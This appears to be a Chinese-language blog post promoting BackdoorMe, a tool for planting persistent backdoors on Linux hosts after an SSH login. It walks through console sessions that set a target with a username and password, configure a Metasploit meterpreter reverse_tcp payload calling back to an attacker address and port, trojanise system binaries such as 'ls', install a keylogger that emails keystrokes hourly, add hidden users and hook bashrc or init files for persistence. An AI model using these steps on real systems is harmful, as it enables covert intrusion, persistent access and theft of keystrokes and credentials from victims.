强大的自动化后门 用于渗透测试(BackdoorMe)

BackdoorMe是一款功能强大的自动化后门工具，用于渗透测试！很明显，软件是带有攻击性的，严禁用于非法用途。该工具目前使用了metasploit接口，以后会慢慢淡化接口，增强自身特色。需要的朋友下！

什么是后门程序

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

后门程序又称特洛依木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。

BackdoorMe有哪些功能模块

其内置了Backdoors（后门）、Modules（模块）和Auxiliaries（辅助模块）

Bash

Bash2 (依赖更多)

Metasploit

Netcat

Netcat-traditional

Perl

Php (非WEB后门，但使用了WEB模块)

Pupy

Python

Web (php –WEB后门)

BackdoorMe怎么用

在安装backdoorme之前，请先确保您准备好了所有的依赖包。

$ python dependencies.py

启动backdoorme：

$ python master.py     ___           __      __              __  ___    / _ )___ _____/ /_____/ /__  ___  ____/  |/  /__   / _  / _ `/ __/  '_/ _  / _ \/ _ \/ __/ /|_/ / -_)  /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/  /_/\__/  Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands.  Type "addtarget" to set a target, and "open" to open an SSH connection to that target.  Using local IP of 10.1.0.1.  >>

加入target：

>> addtarget  Target Hostname: 10.1.0.2  Username: victim  Password: password123   + Target 1 Set!  >>

Backdoor

请输入“use”关键词来使用后门：

>> use metasploit  + Using current target 1.   + Using Metasploit backdoor...  (msf) >>

从从这儿开始，你可以设置后门相关选项，运行“show options”或者“help”，来查看需要配置的参数。这里设置选项，用“set”就行了。

(msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        initd       name of the backdoor        False  format      elf     format to write the backdoor to     True  lhost       10.1.0.1        local IP to connect back to     True  encoder     none        encoder to use for the backdoor     False  lport       4444        local port to connect back on       True  payload     linux/x86/meterpreter/reverse_tcp       payload to deploy in backdoor       True  (msf) >> set name apache   + name => apache  (msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        apache      name of the backdoor        False  ...

Modules

每个后门在添加了额外的模块后，会变得更加有效。要添加一个模块，只需要使用“add”。

(msf) >> add poison   + Poison module added

每个模块都有额外的参数可以定制，如果运行了“help”，你可以看到或者设置任何附加选项。

(msf) >> help  ...  Poison module options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        ls        name of command to poison     False  location /bin       where to put poisoned files into        False

现在能启用的模块包括：

Poison：

感染目标计算机上的可执行文件，它会编译一个exe，把原有的程序变为后门。

比如，如果这个模块感染了“ls”，它会进行编译，然后把正常“ls”给变成后门“ls”，这样一来用户可以更频繁地运行“ls”后门。

Cron：

作用和做法同上。

Web：

启动WEB服务，放置存有后门的WEB页面，访问该网页则监听开始。

Keylogger：

植入键盘记录器，在配置时可以配入点自己邮件，每小时会收到结果。

User：

添加新用户。

Startup：

可以将后门植入bashrc或者init文件。

Auxiliaries

为了更加隐蔽，某些用户可能会希望在目标机 器上使用特定的服务。应用auxiliary模块，使用“apply”即可。

>> apply user  + User Auxiliary Module added.

Auxiliaries支持modules的使用，所有它们能更加隐蔽和频繁的运行。

>> (user) add startup  + Startup Module added.

现有启用的auxiliaries包括：

User

在目标机器添加新用户。

Targets

Backdoorme支持同时操作多个目标，使用数字序号切换即可。比如，使用“use metasploit 2”命令，可以在目标“2”上使用msf。